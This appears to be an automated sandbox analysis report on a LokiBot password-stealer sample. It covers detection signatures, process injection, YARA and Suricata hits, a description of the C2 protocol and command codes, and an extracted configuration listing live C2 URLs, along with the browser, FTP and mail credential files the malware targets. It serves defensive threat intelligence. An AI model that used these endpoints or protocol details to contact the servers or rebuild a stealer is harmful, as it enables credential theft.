Edit tour

Windows Analysis Report
1e#U0414.exe

Overview

General Information

Sample name:	1e#U0414.exe renamed because original name is a hash value
Original sample name:	_(PO_46338032)_-- .exe
Analysis ID:	1518306
MD5:	ed9fe2c20a68172921c064d0d9886b7b
SHA1:	d892be8018cbc88b8cdd0db2338f643448630757
SHA256:	bfcc16e302514e80fdc77675291f1bdb32796e7b77274f7596049938d0652347
Tags:	exeuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1e#U0414.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\1e#U0414.exe" MD5: ED9FE2C20A68172921C064D0D9886B7B)

aspnet_compiler.exe (PID: 6808 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

aspnet_compiler.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ef8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x52c3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13b07:$des3: 68 03 66 00 00 0x17ef8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17fc4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x540a0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x41453:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x4fc97:$des3: 68 03 66 00 00 0x540a0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x5416c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: 1e#U0414.exe PID: 6760	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: 1e#U0414.exe PID: 6760	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 1e#U0414.exe PID: 6760	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2c339:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x343e1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 6880	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6880	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6880	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6880	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1065e:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.1e#U0414.exe.446ab08.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.1e#U0414.exe.446ab08.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.1e#U0414.exe.446ab08.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.1e#U0414.exe.446ab08.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.1e#U0414.exe.446ab08.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.1e#U0414.exe.446ab08.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.1e#U0414.exe.446ab08.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.1e#U0414.exe.446ab08.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.1e#U0414.exe.3450438.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.1e#U0414.exe.3450438.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.1e#U0414.exe.3450438.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.1e#U0414.exe.3450438.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1cc68:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.1e#U0414.exe.3450438.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xa01b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.1e#U0414.exe.3450438.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x1962c:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x19874:$a2: last_compatible_version
0.2.1e#U0414.exe.3450438.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1885f:$des3: 68 03 66 00 00 0x1cc68:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1cd34:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.1e#U0414.exe.3450438.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x1bdae:$f1: FileZilla\recentservers.xml 0x1bdee:$f2: FileZilla\sitemanager.xml 0x1a05e:$b2: Mozilla\Firefox\Profiles 0x19dc8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x19f72:$s4: logins.json 0x1ae1c:$s6: wand.dat 0x1989c:$a1: username_value 0x1988c:$a2: password_value 0x19ed7:$a3: encryptedUsername 0x19f44:$a3: encryptedUsername 0x19eea:$a4: encryptedPassword 0x19f58:$a4: encryptedPassword
0.2.1e#U0414.exe.446ab08.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.1e#U0414.exe.446ab08.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.1e#U0414.exe.446ab08.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.1e#U0414.exe.446ab08.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.1e#U0414.exe.446ab08.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 32 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\1e#U0414.exe", ParentImage: C:\Users\user\Desktop\1e#U0414.exe, ParentProcessId: 6760, ParentProcessName: 1e#U0414.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6808, ProcessName: aspnet_compiler.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:37.472266+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:38.475893+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:36.808752+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.422340+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.334278+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.272883+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:42.154915+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:43.005872+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:44.024460+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.864953+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.794467+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.586604+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.459806+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.329147+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.199142+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:50.188831+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:51.102415+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.992772+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.881678+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.727656+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.537764+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.513579+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.412404+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.598723+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.474678+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.484196+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.473536+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.372433+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.239881+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.276280+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:04.099861+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.914672+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.723093+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.587971+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.449997+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:08.319578+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.181026+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:10.039622+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:10.892410+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:11.755447+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:12.608011+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:13.487014+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:14.457362+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:15.345683+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:16.357807+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.230322+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:18.111648+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:18.948583+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:19.785848+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	55923	188.114.96.3	80	TCP
